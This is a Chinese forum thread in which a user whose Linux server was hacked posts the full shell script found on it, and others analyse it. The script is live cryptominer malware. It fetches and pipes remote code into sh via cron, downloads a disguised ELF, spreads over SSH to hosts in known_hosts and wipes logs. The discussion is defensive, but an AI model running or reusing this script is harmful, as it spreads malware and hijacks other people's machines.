Linux 被入侵了该怎么整，入侵者摆明了不怕你知道

对抗这种 rootkit 难度爆表，，回滚更划算，

@cpdyj0 我想实在没办法也只能重装了，我的系统设置的是强密码，防火墙一直开着，ssh 改了端口，没有运行过脚本语言，就跑着 java，mysql，redis，就这样还能被黑进来。头一次遇到

/tmp/watchdogs 有个看门狗程序.. 要不上个 clamav 扫扫

the script
```sh
export PATH=$PATH:/bin:/usr/bin:/sbin:/usr/local/bin:/usr/sbin

echo "*/10 * * * * (curl -fsSL https://pastebin.com/raw/sByq0rym||wget -q -O- https://pastebin.com/raw/sByq0rym)|sh" | crontab -

ps auxf | grep -v grep | grep hwlh3wlh44lh | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep /usr/bin/.sshd | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep /usr/bin/bsd-port | awk '{print $2}' | xargs kill -9
ps auxf|grep -v grep|grep "xmr" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xig" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "ddgs" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "qW3xT" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "wnTKYg" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "t00ls.ru" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "sustes" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "thisxxs" | awk '{print $2}' | xargs kill -9
ps auxf|grep -v grep|grep "hashfish" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "kworkerds" | awk '{print $2}'|xargs kill -9
chattr -i /etc/cron.d/root
chattr -i /etc/cron.d/system
chattr -i /etc/ld.so.preload
chattr -i /etc/cron.d/apache
chattr -i /var/spool/cron/root
chattr -i /var/spool/cron/crontabs/root
chattr -i /usr/local/bin/dns
chattr -i /usr/sbin/netdns
chattr -i /bin/netstat
rm -rf /etc/cron.d/system /etc/cron.d/apache /etc/cron.hourly/oanacron /etc/cron.daily/oanacron /etc/cron.monthly/oanacron /usr/local/lib/libntp.so /etc/init.d/netdns /etc/init.d/kworker /bin/httpdns /usr/local/bin/dns /bin/netstat /usr/sbin/netdns
chkconfig --del kworker
chkconfig --del netdns
p=$(ps auxf|grep -v grep|grep ksoftirqds|wc -l)
if [ ${p} -eq 0 ];then
ps auxf|grep -v grep | awk '{if($3>=80.0) print $2}'| xargs kill -9
fi
if [ -e "/tmp/gates.lod" ]; then
rm -rf $(readlink /proc/$(cat /tmp/gates.lod)/exe)
kill -9 $(cat /tmp/gates.lod)
rm -rf $(readlink /proc/$(cat /tmp/moni.lod)/exe)
kill -9 $(cat /tmp/moni.lod)
rm -rf /tmp/{gates,moni}.lod
fi

if [ ! -f "/tmp/.lsdpid" ]; then
ARCH=$(uname -m)
if [ ${ARCH}x = "x86_64x" ]; then
(curl -fsSL http://thyrsi.com/t6/672/1550667479x1822611209.jpg -o /tmp/watchdogs||wget -q http://thyrsi.com/t6/672/1550667479x1822611209.jpg -O /tmp/watchdogs) && chmod +x /tmp/watchdogs
elif [ ${ARCH}x = "i686x" ]; then
(curl -fsSL http://thyrsi.com/t6/672/1550667515x1822611209.jpg -o /tmp/watchdogs||wget -q http://thyrsi.com/t6/672/1550667515x1822611209.jpg -O /tmp/watchdogs) && chmod +x /tmp/watchdogs
else
(curl -fsSL http://thyrsi.com/t6/672/1550667515x1822611209.jpg -o /tmp/watchdogs||wget -q http://thyrsi.com/t6/672/1550667515x1822611209.jpg -O /tmp/watchdogs) && chmod +x /tmp/watchdogs
fi
nohup /tmp/watchdogs >/dev/null 2>&1 &
elif [ ! -f "/proc/$(cat /tmp/.lsdpid)/stat" ]; then
ARCH=$(uname -m)
if [ ${ARCH}x = "x86_64x" ]; then
(curl -fsSL http://thyrsi.com/t6/672/1550667479x1822611209.jpg -o /tmp/watchdogs||wget -q http://thyrsi.com/t6/672/1550667479x1822611209.jpg -O /tmp/watchdogs) && chmod +x /tmp/watchdogs
elif [ ${ARCH}x = "i686x" ]; then
(curl -fsSL http://thyrsi.com/t6/672/1550667515x1822611209.jpg -o /tmp/watchdogs||wget -q http://thyrsi.com/t6/672/1550667515x1822611209.jpg -O /tmp/watchdogs) && chmod +x /tmp/watchdogs
else
(curl -fsSL http://thyrsi.com/t6/672/1550667515x1822611209.jpg -o /tmp/watchdogs||wget -q http://thyrsi.com/t6/672/1550667515x1822611209.jpg -O /tmp/watchdogs) && chmod +x /tmp/watchdogs
fi
nohup /tmp/watchdogs >/dev/null 2>&1 &
fi

if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then
for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '(curl -fsSL https://pastebin.com/raw/sByq0rym||wget -q -O- https://pastebin.com/raw/sByq0rym)|sh >/dev/null 2>&1 &' & done
fi
echo 0>/root/.ssh/authorized_keys
echo 0>/var/spool/mail/root
echo 0>/var/log/wtmp
echo 0>/var/log/secure
echo 0>/var/log/cron
#
#
#
```

@abcbuzhiming 直接 ip 暴露到外网吗？那太危险了

昨天同样中招，衰啊

拜这个帖子所赐发现了 pastebin 这个神奇的网站。
如果不是自己运行了来历不明的程序的话可能就是其他服务的漏洞被利用了，而且感觉可能还是 root 权限运行的服务

开 ssh，让我上去看看

不是加密，只是单纯 base6*4

重点应该是这两句`if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then
for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '(curl -fsSL https://pastebin.com/raw/sByq0rym||wget -q -O- https://pastebin.com/raw/sByq0rym)|sh >/dev/null 2>&1 &' & done
fi`和下载后缀为.jpg 其实是 elf 的挖矿软件并重命名为 watchdogs

一点进去大大的 base64 -d 。。。。

别想了，直接重装吧。

当然别忘记去 pastebin 这几个站上面发 abuse report 这几个。

这不就是 base64 吗

Redis 权限？

目测 redis 没开认证

@pursuer 这个网址很早很早很早以前就被墙了。。能访问应该是 CF 这个 CDN 的功劳。。。。

@defunct9 #8 感觉好久没见过老哥了

如果 redis 权限不控制好的话，是可以把公钥 dump 进你的系统的

阿里云这么容易被黑的？

@viruser 这句看起来没啥，只是在传播到其它机器上。只是想知道机器是怎么被攻入的。楼主说用了强密码，再考虑到连 b64 都不知道，怀疑有啥乌龙把密码泄露了。